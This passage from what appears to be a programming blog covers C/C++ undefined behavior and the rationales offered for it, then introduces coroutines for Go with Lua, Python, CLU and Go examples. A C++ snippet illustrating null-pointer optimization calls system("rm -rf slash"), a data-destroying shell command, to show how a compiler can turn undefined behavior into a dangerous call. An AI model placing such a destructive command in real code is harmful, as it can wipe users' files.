completion. But it turns out that, at least with the latest Clang, the program runs to completion anyway: the call to <code>maybeStop</code> is optimized away entirely, even when <code>stop</code> is <code>1</code>. <p> The problem is that C++ defines that every side-effect-free loop may be assumed by the compiler to terminate. That is, a loop that does not terminate is therefore undefined behavior. This is purely for compiler optimizations, once again treated as more important than correctness. The rationale for this decision played out in the C standard and was more or less adopted in the C++ standard as well. <p> John Regehr pointed out this problem in his post “<a href="https://blog.regehr.org/archives/140">C Compilers Disprove Fermat’s Last Theorem</a>,” which included this entry in a FAQ:<blockquote> <p> Q: Does the C standard permit/forbid the compiler to terminate infinite loops? 
<p> A: The compiler is given considerable freedom in how it implements the C program, but its output must have the same externally visible behavior that the program would have when interpreted by the “C abstract machine” that is described in the standard. Many knowledgeable people (including me) read this as saying that the termination behavior of a program must not be changed. Obviously some compiler writers disagree, or else don’t believe that it matters. The fact that reasonable people disagree on the interpretation would seem to indicate that the C standard is flawed.</blockquote> <p> A few months later, Douglas Walls wrote <a href="http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1509.pdf">WG14/N1509: Optimizing away infinite loops</a>, making the case that the standard should <i>not</i> allow this optimization. In response, Hans-J. Boehm wrote <a href="http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1528.htm">WG14/N1528: Why undefined behavior for infinite loops?</a>, arguing for allowing the optimization. <p> Consider the potential optimization of this code: <pre>for (p = q; p != 0; p = p-&gt;next) ++count; for (p = q; p != 0; p = p-&gt;next) ++count2; </pre> <p> A sufficiently smart compiler might reduce it to this code: <pre>for (p = q; p != 0; p = p-&gt;next) { ++count; ++count2; } </pre> <p> Is that safe? Not if the first loop is an infinite loop. If the list at <code>p</code> is cyclic and another thread is modifying <code>count2</code>, then the first program has no race, while the second program does. Compilers clearly can’t turn correct, race-free programs into racy programs. But what if we declare that infinite loops are not correct programs? That is, what if infinite loops were undefined behavior? Then the compiler could optimize to its robotic heart’s content. This is exactly what the C standards committee decided to do. <p> The rationale, paraphrased, was: <ul> <li> It is very difficult to tell if a given loop is infinite. <li> Infinite loops are rare and typically unintentional. <li> There are many loop optimizations that are only valid for non-infinite loops. <li> The performance wins of these optimizations are deemed important. <li> Some compilers already apply these optimizations, making infinite loops non-portable too. <li> Therefore, we should declare programs with infinite loops undefined behavior, enabling the optimizations.</ul> <a class=anchor href="#null"><h2 id="null">Null pointer usage</h2></a> <p> We’ve all seen how dereferencing a null pointer causes a crash on modern operating systems: they leave page zero unmapped by default precisely for this purpose. But not all systems where C and C++ run have hardware memory protection. For example, I wrote my first C and C++ programs using Turbo C on an MS-DOS system. Reading or writing a null pointer did not cause any kind of fault: the program just touched the memory at location zero and kept running. The correctness of my code improved dramatically when I moved to a Unix system that made those programs crash at the moment of the mistake. Because the behavior is non-portable, though, dereferencing a null pointer is undefined behavior. <p> At some point, the justification for keeping the undefined behavior became performance. 
<a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">Chris Lattner explains</a>:<blockquote> <p> In C-based languages, NULL being undefined enables a large number of simple scalar optimizations that are exposed as a result of macro expansion and inlining.</blockquote> <p> In <a href="plmm#ub">an earlier post</a>, I showed this example, lifted from <a href="https://twitter.com/andywingo/status/903577501745770496">Twitter in 2017</a>: <pre>#include &lt;cstdlib&gt; typedef int (*Function)(); static Function Do; static int EraseAll() { return system("rm -rf slash"); } void NeverCalled() { Do = EraseAll; } int main() { return Do(); } </pre> <p> Because calling <code>Do()</code> is undefined behavior when <code>Do</code> is null, a modern C++ compiler like Clang simply assumes that can’t possibly be what’s happening in <code>main</code>. Since <code>Do</code> must be either null or <code>EraseAll</code> and since null is undefined behavior, we might as well assume <code>Do</code> is <code>EraseAll</code> unconditionally, even though <code>NeverCalled</code> is never called. So this program can be (and is) optimized to: <pre>int main() { return system("rm -rf slash"); } </pre> <p> Lattner gives <a href="https://blog.llvm.org/2011/05/what-every-c-programmer-should-know_14.html">an equivalent example</a> (search for <code>FP()</code>) and then this advice:<blockquote> <p> The upshot is that it is a fixable issue: if you suspect something weird is going on like this, try building at -O0, where the compiler is much less likely to be doing any optimizations at all.</blockquote> <p> This advice is not uncommon: if you cannot debug the correctness problems in your C++ program, disable optimizations. <a class=anchor href="#sort"><h2 id="sort">Crashes out of sorts</h2></a> <p> C++’s <code>std::sort</code> sorts a collection of values (abstracted as a random access iterator, but almost always an array) according to a user-specified comparison function. The default function is <code>operator&lt;</code>, but you can write any function. For example if you were sorting instances of class <code>Person</code> your comparison function might sort by the <code>LastName</code> field, breaking ties with the <code>FirstName</code> field. These comparison functions end up being subtle yet boring to write, and it’s easy to make a mistake. If you do make a mistake and pass in a comparison function that returns inconsistent results or accidentally reports that any value is less than itself, that’s undefined behavior: <code>std::sort</code> is now allowed to do whatever it likes, including walking off either end of the array and corrupting other memory. If you’re lucky, it will pass some of this memory to your comparison function, and since it won’t have pointers in the right places, your comparison function will crash. Then at least you have a chance of guessing the comparison function is at fault. In the worst case, memory is silently corrupted and the crash happens much later, with <code>std::sort</code> is nowhere to be found. <p> Programmers make mistakes, and when they do, <code>std::sort</code> corupts memory. This is not hypothetical. It happens enough in practice to be a <a href="https://stackoverflow.com/questions/18291620/why-will-stdsort-crash-if-the-comparison-function-is-not-as-operator">popular question on StackOverflow</a>. 
<p> As a final note, it turns out that <code>operator&lt;</code> is not a valid comparison function on floating-point numbers if NaNs are involved, because: <ul> <li> 1 &lt; NaN and NaN &lt; 1 are both false, implying NaN == 1. <li> 2 &lt; NaN and NaN &lt; 2 are both false, implying NaN == 2. <li> Since NaN == 1 and NaN == 2, 1 == 2, yet 1 &lt; 2 is true.</ul> <p> Programming with NaNs is never pleasant, but it seems particularly extreme to allow <code>std::sort</code> to crash when handed one. <a class=anchor href="#reveal"><h2 id="reveal">Reflections and revealed preferences</h2></a> <p> Looking over these examples, it could not be more obvious that in modern C and C++, performance is job one and correctness is job two. To a C/C++ compiler, a programmer making a mistake and (gasp!) compiling a program containing a bug is just not a concern. Rather than have the compiler point out the bug or at least compile the code in a clear, understandable, debuggable manner, the approach over and over again is to let the compiler do whatever it likes, in the name of performance. <p> This may not be the wrong decision for these languages. There are undeniably power users for whom every last bit of performance translates to very large sums of money, and I don’t claim to know how to satisfy them otherwise. On the other hand, this performance comes at a significant development cost, and there are probably plenty of people and companies who spend more than their performance savings on unnecessarily difficult debugging sessions and additional testing and sanitizing. It also seems like there must be a middle ground where programmers retain most of the control they have in C and C++ but the program doesn’t crash when sorting NaNs or behave arbitrarily badly if you accidentally dereference a null pointer. Whatever the merits, it is important to see clearly the choice that C and C++ are making. <p> In the case of arithmetic overflow, later drafts of the proposal removed the defined behavior for wrapping, explaining:<blockquote> <p> The main change between [P0907r0] and the subsequent revision is to maintain undefined behavior when signed integer overflow occurs, instead of defining wrapping behavior. This direction was motivated by: <ul> <li> Performance concerns, whereby defining the behavior prevents optimizers from assuming that overflow never occurs; <li> Implementation leeway for tools such as sanitizers; <li> Data from Google suggesting that over 90% of all overflow is a bug, and defining wrapping behavior would not have solved the bug.</ul> </blockquote> <p> Again, performance concerns rank first. I find the third item in the list particularly telling. I’ve known C/C++ compiler authors who got excited about a 0.1% performance improvement, and incredibly excited about 1%. Yet here we have an idea that would change 10% of affected programs from incorrect to correct, and it is rejected, because performance is more important. <p> The argument about sanitizers is more nuanced. Leaving a behavior undefined allows any implementation at all, including reporting the behavior at runtime and stopping the program. 
True, the widespread use of undefined behavior enables sanitizers like ThreadSanitizer, MemorySanitizer, and UBSan, but so would defining the behavior as “either this specific behavior, or a sanitizer report.” If you believed correctness was job one, you could define overflow to wrap, fixing the 10% of programs outright and making the 90% behave at least more predictably, and then at the same time define that overflow is still a bug that can be reported by sanitizers. You might object that requiring wrapping in the absence of a sanitizer would hurt performance, and that’s fine: it’s just more evidence that performance trumps correctness. <p> One thing I find surprising, though, is that correctness gets ignored even when it clearly doesn’t hurt performance. It would certainly not hurt performance to emit a compiler warning about deleting the <code>if</code> statement testing for signed overflow, or about optimizing away the possible null pointer dereference in <code>Do()</code>. Yet I could find no way to make compilers report either one, not even with <code>-Wall</code>. <p> The explanatory shift from non-portable to optimizable also seems revealing. As far as I can tell, C89 did not use performance as a justification for any of its undefined behaviors. They were non-portabilities, like signed overflow and null pointer dereferences, or they were outright bugs, like use-after-free. But now experts like Chris Lattner and Hans Boehm point to optimization potential, not portability, as justification for undefined behaviors. I conclude that the rationales really have shifted from the mid-1980s to today: an idea that was meant to capture non-portability has been preserved for performance, trumping concerns like correctness and debuggability. <p> Occasionally in Go we have <a href="https://go.dev/blog/compat#input">changed library functions to remove surprising behavior</a>. It’s always a difficult decision, but we are willing to break existing programs depending on a mistake if correcting the mistake fixes a much larger number of programs. I find it striking that the C and C++ standards committees are willing in some cases to break existing programs if doing so merely <i>speeds up</i> a large number of programs. This is exactly what happened with the infinite loops. <p> I find the infinite loop example telling for a second reason: it shows clearly the escalation from non-portable to optimizable. In fact, it would appear that if you want to break C++ programs in service of optimization, one possible approach is to just do that in a compiler and wait for the standards committee to notice. The de facto non-portability of whatever programs you have broken can then serve as justification for undefining their behavior, leading to a future version of the standard in which your optimization is legal. In the process, programmers have been handed yet another footgun to try to avoid setting off. <p> (A common counterargument is that the standards committee cannot force existing implementations to change their compilers. This doesn’t hold up to scrutiny: every new feature that gets added is the standards committee forcing existing implementations to change their compilers.) <p> I am not claiming that anything should change about C and C++. I just want people to recognize that the current versions of these languages sacrifice correctness for performance. To some extent, all languages do this: there is almost always a tradeoff between faster implementations and slower, safer ones.
Go has data races in part for performance reasons: we could have done everything by message copying or with a single global lock instead, but the performance wins of shared memory were too large to pass up. For C and C++, though, it seems no performance win is too small to trade against correctness. <p> As a programmer, you have a tradeoff to make too, and the language standards make it clear which side they are on. In some contexts, performance is the dominant priority and nothing else matters quite as much. If so, C or C++ may be the right tool for you. But in most contexts, the balance flips the other way. If programmer productivity, debuggability, reproducible bugs, and overall correctness and understandability are more important than squeezing every last little bit of performance, then C and C++ are not the right tools for you. I say this with some regret, as I spent many years happily writing C programs. <p> I have tried to avoid exaggerated, hyperbolic language in this post, instead laying out the tradeoff and the preferences revealed by the decisions being made. John Regehr wrote a less restrained series of posts about undefined behavior a decade ago, and in <a href="https://blog.regehr.org/archives/226">one of them</a> he concluded:<blockquote> <p> It is basically evil to make certain program actions wrong, but to not give developers any way to tell whether or not their code performs these actions and, if so, where. One of C’s design points was “trust the programmer.” This is fine, but there’s trust and then there’s trust. I mean, I trust my 5 year old but I still don’t let him cross a busy street by himself. Creating a large piece of safety-critical or security-critical code in C or C++ is the programming equivalent of crossing an 8-lane freeway blindfolded.</blockquote> <p> To be fair to C and C++, if you set yourself the goal of crossing an 8-lane freeway blindfolded, it does make sense to focus on doing it as fast as you possibly can. Coroutines for Go tag:research.swtch.com,2012:research.swtch.com/coro 2023-07-17T14:00:00-04:00 2023-07-17T14:02:00-04:00 Why we need coroutines for Go, and what they might look like. <p> This post is about why we need a coroutine package for Go, and what it would look like. But first, what are coroutines? <p> Every programmer today is familiar with function calls (subroutines): F calls G, which stops F and runs G. G does its work, potentially calling and waiting for other functions, and eventually returns. When G returns, G is gone and F continues running. In this pattern, only one function is running at a time, while its callers wait, all the way up the call stack. <p> In contrast to subroutines, coroutines run concurrently on different stacks, but it’s still true that only one is running at a time, while its caller waits. F starts G, but G does not run immediately. Instead, F must explicitly <i>resume</i> G, which then starts running. At any point, G may turn around and <i>yield</i> back to F. That pauses G and continues F from its resume operation. Eventually F calls resume again, which pauses F and continues G from its yield. On and on they go, back and forth, until G returns, which cleans up G and continues F from its most recent resume, with some signal to F that G is done and that F should no longer try to resume G. In this pattern, only one coroutine is running at a time, while its caller waits on a different stack. They take turns in a well-defined, coordinated manner. <p> This is a bit abstract. Let’s look at real programs. 
<a class=anchor href="#lua"><h2 id="lua">Coroutines in Lua</h2></a> <p> To use a <a href="pcdata#gopher">venerable example</a>, consider comparing two binary trees to see if they have the same value sequence, even if their structures are different. For example, here is code in <a href="https://lua.org">Lua 5</a> to generate some binary trees: <pre>function T(l, v, r) return {left = l, value = v, right = r} end e = nil t1 = T(T(T(e, 1, e), 2, T(e, 3, e)), 4, T(e, 5, e)) t2 = T(e, 1, T(e, 2, T(e, 3, T(e, 4, T(e, 5, e))))) t3 = T(e, 1, T(e, 2, T(e, 3, T(e, 4, T(e, 6, e))))) </pre> <p> The trees <code>t1</code> and <code>t2</code> both contain the values 1, 2, 3, 4, 5; <code>t3</code> contains 1, 2, 3, 4, 6. <p> We can write a coroutine to walk over a tree and yield each value: <pre>function visit(t) if t ~= nil then -- note: ~= is "not equal" visit(t.left) coroutine.yield(t.value) visit(t.right) end end </pre> <p> <p> Then to compare two trees, we can create two visit coroutines and alternate between them to read and compare successive values: <pre>function cmp(t1, t2) co1 = coroutine.create(visit) co2 = coroutine.create(visit) while true do ok1, v1 = coroutine.resume(co1, t1) ok2, v2 = coroutine.resume(co2, t2) if ok1 ~= ok2 or v1 ~= v2 then return false end if not ok1 and not ok2 then return true end end end </pre> <p> The <code>t1</code> and <code>t2</code> arguments to <code>coroutine.resume</code> are only used on the first iteration, as the argument to <code>visit</code>. Subsequent resumes return that value from <code>coroutine.yield</code>, but the code ignores the value. <p> A more idiomatic Lua version would use <code>coroutine.wrap</code>, which returns a function that hides the coroutine object: <pre><span style="color: #aaa">function cmp(t1, t2)</span> next1 = coroutine.wrap(function() visit(t1) end) next2 = coroutine.wrap(function() visit(t2) end) <span style="color: #aaa"> while true</span> <span style="color: #aaa"> do</span> v1 = next1() v2 = next2() if v1 ~= v2 then <span style="color: #aaa"> return false</span> <span style="color: #aaa"> end</span> if v1 == nil and v2 == nil then <span style="color: #aaa"> return true</span> <span style="color: #aaa"> end</span> <span style="color: #aaa"> end</span> <span style="color: #aaa">end</span> </pre> <p> When the coroutine has finished, the <code>next</code> function returns <code>nil</code> (<a href="https://gist.github.com/rsc/5908886288b741b847a83c0c6597c690">full code</a>). <a class=anchor href="#python"><h2 id="python">Generators in Python (Iterators in CLU)</h2></a> <p> Python provides generators that look a lot like Lua’s coroutines, but they are not coroutines, so it’s worth pointing out the differences. The main difference is that the “obvious” programs don’t work. For example, here’s a direct translation of our Lua tree and visitor to Python: <pre>def T(l, v, r): return {'left': l, 'value': v, 'right': r} def visit(t): if t is not None: visit(t['left']) yield t['value'] visit(t['right']) </pre> <p> But this obvious translation doesn’t work: <pre>&gt;&gt;&gt; e = None &gt;&gt;&gt; t1 = T(T(T(e, 1, e), 2, T(e, 3, e)), 4, T(e, 5, e)) &gt;&gt;&gt; for x in visit(t1): ... print(x) ... 4 &gt;&gt;&gt; </pre> <p> We lost 1, 2, 3, and 5. What happened? <p> In Python, that <code>def visit</code> does not define an ordinary function. 
Because the body contains a <code>yield</code> statement, the result is a generator instead: <pre>&gt;&gt;&gt; type(visit(t1)) &lt;class 'generator'&gt; &gt;&gt;&gt; </pre> <p> The call <code>visit(t['left'])</code> doesn’t run the code in <code>visit</code> at all. It only creates and returns a new generator, which is then discarded. To avoid discarding those results, you have to loop over the generator and re-yield them: <pre><span style="color: #aaa"></span> <span style="color: #aaa">def visit(t):</span> <span style="color: #aaa"> if t is not None:</span> for x in visit(t[&#39;left&#39;]): yield x <span style="color: #aaa"> yield t[&#39;value&#39;]</span> for x in visit(t[&#39;right&#39;]): yield x </pre> <p> Python 3.3 introduced <code>yield</code> <code>from</code>, allowing: <pre><span style="color: #aaa">def visit(t):</span> <span style="color: #aaa"> if t is not None:</span> yield from visit(t[&#39;left&#39;]) <span style="color: #aaa"> yield t[&#39;value&#39;]</span> yield from visit(t[&#39;right&#39;]) </pre> <p> The generator object contains the state of the single call to <code>visit</code>, meaning local variable values and which line is executing. That state is pushed onto the call stack each time the generator is resumed and then popped back into the generator object at each <code>yield</code>, which can only occur in the top-most call frame. In this way, the generator uses the same stack as the original program, avoiding the need for a full coroutine implementation but introducing these confusing limitations instead. <p> Python’s generators appear to be almost exactly copied from CLU, which pioneered this abstraction (and so many other things), although CLU calls them iterators, not generators. A CLU tree iterator looks like: <pre>visit = iter (t: cvt) yields (int): tagcase t tag empty: ; tag non_empty(t: node): for x: int in tree$visit(t.left) do yield(x); end; yield(t.value); for x: int in tree$visit(t.right) do yield(x); end; end; end visit; </pre> <p> The syntax is different, especially the <code>tagcase</code> that is examining a tagged union representation of a tree, but the basic structure, including the nested <code>for</code> loops, is exactly the same as our first working Python version. Also, because CLU was statically typed, <code>visit</code> is clearly marked as an iterator (<code>iter</code>), not a function (<code>proc</code> in CLU). Thanks to that type information, misuse of <code>visit</code> as an ordinary function call, like in our buggy Python example, is something that the compiler could (and I assume did) diagnose. <p> About CLU’s implementation, the original implementers wrote, “Iterators are a form of coroutine; however, their use is sufficiently constrained that they are implemented using just the program stack. Using an iterator is therefore only slightly more expensive than using a procedure.” This sounds exactly like the explanation I gave above for the Python generators. For more, see Barbara Liskov <i>et al.</i>’s 1977 paper “<a href="https://dl.acm.org/doi/10.1145/359763.359789">Abstraction Mechanisms in CLU</a>”, specifically sections 4.2, 4.3, and 6. <a class=anchor href="#thread"><h2 id="thread">Coroutines, Threads, and Generators</h2></a> <p> At first glance, coroutines, threads, and generators look alike. All three provide <a href="pcdata">concurrency</a> in one form or another, but they differ in important ways.
<ul> <li> <p> Coroutines provide concurrency without parallelism: when one coroutine is running, the one that resumed it or yielded to it is not. <p> Because coroutines run one at a time and only switch at specific points in the program, the coroutines can share data among themselves without races. The explicit switches (<code>coroutine.resume</code> in the first Lua example or calling a <code>next</code> function in the second Lua example) serve as synchronization points, creating <a href="gomm#gos_memory_model_today">happens-before edges</a>. <p> Because scheduling is explicit (without any preemption) and done entirely without the operating system, a coroutine switch takes at most around ten nanoseconds, usually even less. Startup and teardown are also much cheaper than for threads. <li> <p> Threads provide more power than coroutines, but with more cost. The additional power is parallelism, and the cost is the overhead of scheduling, including more expensive context switches and the need to add preemption in some form. Typically the operating system provides threads, and a thread switch takes a few microseconds. <p> For this taxonomy, Go’s goroutines are cheap threads: a goroutine switch is closer to a few hundred nanoseconds, because the Go runtime takes on some of the scheduling work, but goroutines still provide the full parallelism and preemption of threads. (Java’s new lightweight threads are basically the same as goroutines.) <li> <p> Generators provide less power than coroutines, because only the top-most frame in the generator is allowed to yield. That frame is moved back and forth between an object and the call stack to suspend and resume it.</ul> <p> Coroutines are a useful building block for writing programs that want concurrency for program structuring but not for parallelism. For one detailed example of that, see my previous post, “<a href="pcdata">Storing Data in Control Flow</a>”. For other examples, see Ana Lúcia De Moura and Roberto Ierusalimschy’s 2009 paper “<a href="https://dl.acm.org/doi/pdf/10.1145/1462166.1462167">Revisiting Coroutines</a>”. For the original example, see Melvin Conway’s 1963 paper “<a href="https://dl.acm.org/doi/pdf/10.1145/366663.366704">Design of a Separable Transition-Diagram Compiler</a>”. <a class=anchor href="#why"><h2 id="why">Why Coroutines in Go?</h2></a> <p> Coroutines are a concurrency pattern not directly served by existing Go concurrency libraries. Goroutines are often close enough, but as we saw, they are not the same, and sometimes that difference matters. <p> For example, Rob Pike’s 2011 talk “<a href="https://go.dev/talks/2011/lex.slide">Lexical Scanning in Go</a>” presents the original lexer and parser for the <a href="https://go.dev/pkg/text/template">text/template package</a>. They ran in separate goroutines connected by a channel, imperfectly simulating a pair of coroutines: the lexer and parser ran in parallel, with the lexer looking ahead to the next token while the parser processed the most recent one. Generators would not have been good enough—the lexer yields values from many different functions—but full goroutines proved to be a bit too much. The parallelism provided by the goroutines caused races and eventually led to abandoning the design in favor of the lexer storing state in an object, which was a more faithful simulation of a coroutine. Proper coroutines would have avoided the races and been more efficient than goroutines. <p> An anticipated future use case for coroutines in Go is iteration over generic collections.
We have discussed adding support to Go for <a href="https://github.com/golang/go/discussions/56413">ranging over functions</a>, which would encourage authors of collections and other abstractions to provide CLU-like iterator functions. Iterators can be implemented today using function values, without any language changes. For example, a slightly simplified tree iterator in Go could be: <pre>func (t *Tree[V]) All(yield func(v V)) { if t != nil { t.left.All(yield) yield(t.value) t.right.All(yield) } } </pre> <p> That iterator can be invoked today as: <pre>t.All(func(v V) { fmt.Println(v) }) </pre> <p> and perhaps a variant could be invoked in a future version of Go as: <pre>for v := range t.All { fmt.Println(v) } </pre> <p> Sometimes, however, we want to iterate over a collection in a way that doesn’t fit a single <code>for</code> loop. The binary tree comparison is an example of this: the two iterations need to be interlaced somehow. As we’ve already seen, coroutines would provide an answer, letting us turn a function like <code>(*Tree).All</code> (a “push” iterator) into a function that returns a stream of values, one per call (a “pull” iterator). <a class=anchor href="#how"><h2 id="how">How to Implement Coroutines in Go</h2></a> <p> If we are to add coroutines to Go, we should aim to do it without language changes. That means the definition of coroutines should be possible to implement and understand in terms of ordinary Go code. Later, I will argue for an optimized implementation provided directly by the runtime, but that implementation should be indistinguishable from the pure Go definition. <p> Let’s start with a very simple version that ignores the yield operation entirely. It just runs a function in another goroutine: <pre>package coro func New[In, Out any](f func(In) Out) (resume func(In) Out) { cin := make(chan In) cout := make(chan Out) resume = func(in In) Out { cin &lt;- in return &lt;-cout } go func() { cout &lt;- f(&lt;-cin) }() return resume } </pre> <p> <code>New</code> takes a function <code>f</code>, which must have one argument and one result. <code>New</code> allocates channels, defines <code>resume</code>, creates a goroutine to run <code>f</code>, and returns the <code>resume</code> function. The new goroutine blocks on <code>&lt;-cin</code>, so there is no opportunity for parallelism. The <code>resume</code> function unblocks the new goroutine by sending an <code>in</code> value and then blocks receiving an <code>out</code> value. This send-receive pair makes a coroutine switch. We can use <code>coro.New</code> like this (<a href="https://go.dev/play/p/gLhqAutT9Q4">full code</a>): <pre>func main() { resume := coro.New(strings.ToUpper) fmt.Println(resume("hello world")) } </pre> <p> So far, <code>coro.New</code> is just a clunky way to call a function.
We need to add <code>yield</code>, which we can pass as an argument to <code>f</code>: <pre>func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) Out) { <span style="color: #aaa"></span> <span style="color: #aaa"> cin := make(chan In)</span> <span style="color: #aaa"> cout := make(chan Out)</span> <span style="color: #aaa"> resume = func(in In) Out {</span> <span style="color: #aaa"> cin &lt;- in</span> <span style="color: #aaa"> return &lt;-cout</span> <span style="color: #aaa"> }</span> yield := func(out Out) In { cout &lt;- out return &lt;-cin } go func() { cout &lt;- f(&lt;-cin, yield) }() <span style="color: #aaa"> return resume</span> <span style="color: #aaa">}</span> </pre> <p> Note that there is still no parallelism here: <code>yield</code> is another send-receive pair. These goroutines are constrained by the communication pattern to act indistinguishably from coroutines. <a class=anchor href="#parser"><h2 id="parser">Example: String Parser</h2></a> <p> Before we build up to iterator conversion, let’s look at a few simpler examples. In “<a href="pcdata">Storing Data in Control Flow</a>,” we considered the problem of taking a function <pre>func parseQuoted(read func() byte) bool </pre> <p> and running it in a separate control flow so that bytes can be provided one at a time to a <code>Write</code> method. Instead of the ad hoc channel-based implementation in that post, we can use: <pre>type parser struct { resume func(byte) Status } func (p *parser) Init() { coparse := func(_ byte, yield func(Status) byte) Status { read := func() byte { return yield(NeedMoreInput) } if !parseQuoted(read) { return BadInput } return Success } p.resume = coro.New(coparse) p.resume(0) } func (p *parser) Write(c byte) Status { return p.resume(c) } </pre> <p> The <code>Init</code> function does all the work, and there is not much of it. It defines a function <code>coparse</code> that has the signature needed by <code>coro.New</code>, which means adding a throwaway input of type <code>byte</code>. That function defines a <code>read</code> that yields <code>NeedMoreInput</code> and then returns the byte provided by the caller. It then runs <code>parseQuoted(read)</code>, converting the boolean result to the usual status code. Having created a coroutine for <code>coparse</code> using <code>coro.New</code>, <code>Init</code> calls <code>p.resume(0)</code> to allow <code>coparse</code> to advance to the first read in <code>parseQuoted</code>. Finally, the <code>Write</code> method is a trivial wrapper around <code>p.resume</code> (<a href="https://go.dev/play/p/MNGVPk11exV">full code</a>). <p> This setup abstracts away the pair of channels that we maintained by hand in the previous post, allowing us to work at a higher level as we write the program. <a class=anchor href="#sieve"><h2 id="sieve">Example: Prime Sieve</h2></a> <p> As a slightly larger example, consider <a href="https://www.cs.dartmouth.edu/~doug/sieve/sieve.pdf">Doug McIlroy’s concurrent prime sieve</a>. It consists of a pipeline of coroutines, one for each prime <code>p</code>, each running: <pre>loop: n = get a number from left neighbor if (p does not divide n) pass n to right neighbor </pre> <p> A counting coroutine on the leftmost side of the pipeline feeds the numbers 2, 3, 4, ... into the left end of the pipeline. A printing coroutine on the rightmost side can read primes out, print them, and create new filtering coroutines.
The first filter in the pipeline removes multiples of 2, the next removes multiples of 3, the next removes multiples of 5, and so on. <p> The <code>coro.New</code> primitive we’ve created lets us take a straightforward loop that yields values and convert it into a function that can be called to obtain each value one at a time. Here is the counter: <pre>func counter() func(bool) int { return coro.New(func(more bool, yield func(int) bool) int { for i := 2; more; i++ { more = yield(i) } return 0 }) } </pre> <p> The counter logic is the function literal passed to <code>New</code>. It takes a yield function of type <code>func(int)</code> <code>bool</code>. The code yields a value by passing it to <code>yield</code> and then receives back a boolean saying whether to continue generating more numbers. When told to stop, either because <code>more</code> was false on entry or because a <code>yield</code> call returned false, the loop ends. It returns a final, ignored value, to satisfy the function type required by <code>New</code>. <p> <code>New</code> turns this loop into a function that is the inverse of <code>yield</code>: a <code>func(bool)</code> <code>int</code> that can be called with true to obtain the next value or with false to shut down the generator. The filtering coroutine is only slightly more complex: <pre>func filter(p int, next func(bool) int) (filtered func(bool) int) { return coro.New(func(more bool, yield func(int) bool) int { for more { n := next(true) if n%p != 0 { more = yield(n) } } return next(false) }) } </pre> <p> It takes a prime <code>p</code> and a <code>next</code> func connected to the coroutine on the left and then returns the filtered output stream to connect to the coroutine on the right. <p> Finally, we have the printing coroutine: <pre>func main() { next := counter() for i := 0; i &lt; 10; i++ { p := next(true) fmt.Println(p) next = filter(p, next) } next(false) } </pre> <p> Starting with the counter, <code>main</code> maintains in <code>next</code> the output of the pipeline constructed so far. Then it loops: read a prime <code>p</code>, print <code>p</code>, and then add a new filter on the right end of the pipeline to remove multiples of <code>p</code> (<a href="https://go.dev/play/p/3OHQ_FHe_Na">full code</a>). <p> Notice that the calling relationship between coroutines can change over time: any coroutine C can call another coroutine D’s <code>next</code> function and become the coroutine that D yields to. The counter’s first <code>yield</code> goes to <code>main</code>, while its subsequent <code>yield</code>s go to the 2-filter. Similarly, each <code>p</code>-filter <code>yield</code>s its first output (the next prime) to <code>main</code>, while its subsequent <code>yield</code>s go to the filter for that next prime. <a class=anchor href="#goroutines"><h2 id="goroutines">Coroutines and Goroutines</h2></a> <p> In a certain sense, it is a misnomer to call these control flows coroutines. They are full goroutines, and they can do everything an ordinary goroutine can, including block waiting for mutexes, channels, system calls, and so on. What <code>coro.New</code> does is create goroutines with access to coroutine switch operations inside the <code>yield</code> and <code>resume</code> functions (which the sieve calls <code>next</code>). The ability to use those operations can even be passed to different goroutines, which is happening with <code>main</code> handing off each of its <code>next</code> streams to each successive <code>filter</code> goroutine.
Unlike the <code>go</code> statement, <code>coro.New</code> adds new concurrency to the program <i>without</i> new parallelism. The goroutine that <code>coro.New(f)</code> creates can only run when some other goroutine explicitly loans it the ability to run using <code>resume</code>; that loan is repaid by <code>yield</code> or by <code>f</code> returning. If you have just one main goroutine and run 10 <code>go</code> statements, then all 11 goroutines can be running at once. In contrast, if you have one main goroutine and run 10 <code>coro.New</code> calls, there are now 11 control flows but the parallelism of the program is what it was before: only one runs at a time. Exactly which goroutines are paused in coroutine operations can vary as the program runs, but the parallelism never increases. <p> In short, <code>go</code> creates a new concurrent, <i>parallel</i> control flow, while <code>coro.New</code> creates a new concurrent, <i>non-parallel</i> control flow. It is convenient to continue to talk about the non-parallel control flows as coroutines, but remember that exactly which goroutines are “non-parallel” can change over the execution of a program, exactly the same way that which goroutines are receiving or sending from channels can change over the execution of a program. <a class=anchor href="#resume"><h2 id="resume">Robust Resumes</h2></a> <p> There are a few improvements we can make to <code>coro.New</code> so that it works better in real programs. The first is to allow <code>resume</code> to be called after the function is done: right now it deadlocks. Let’s add a bool result indicating whether <code>resume</code>’s result came from a yield. The <code>coro.New</code> implementation we have so far is: <pre>func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) Out) { cin := make(chan In) cout := make(chan Out) resume = func(in In) Out { cin &lt;- in return &lt;-cout } yield := func(out Out) In { cout &lt;- out return &lt;-cin } go func() { cout &lt;- f(&lt;-cin, yield) }() return resume } </pre> <p> To add this extra result, we need to track whether <code>f</code> is running and return that result from <code>resume</code>: <pre>func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) (Out, bool)) { <span style="color: #aaa"> cin := make(chan In)</span> <span style="color: #aaa"> cout := make(chan Out)</span> running := true resume = func(in In) (out Out, ok bool) { if !running { return } <span style="color: #aaa"> cin &lt;- in</span> out = &lt;-cout return out, running <span style="color: #aaa"> }</span> <span style="color: #aaa"> yield := func(out Out) In {</span> <span style="color: #aaa"> cout &lt;- out</span> <span style="color: #aaa"> return &lt;-cin</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> go func() {</span> out := f(&lt;-cin, yield) running = false cout &lt;- out <span style="color: #aaa"> }()</span> <span style="color: #aaa"> return resume</span> <span style="color: #aaa">}</span> </pre> <p> Note that since <code>resume</code> can only run while the new goroutine is blocked, and vice versa, sharing the <code>running</code> variable is not a race. The two are synchronizing by taking turns executing. If <code>resume</code> is called after the coroutine has exited, <code>resume</code> returns a zero value and false.
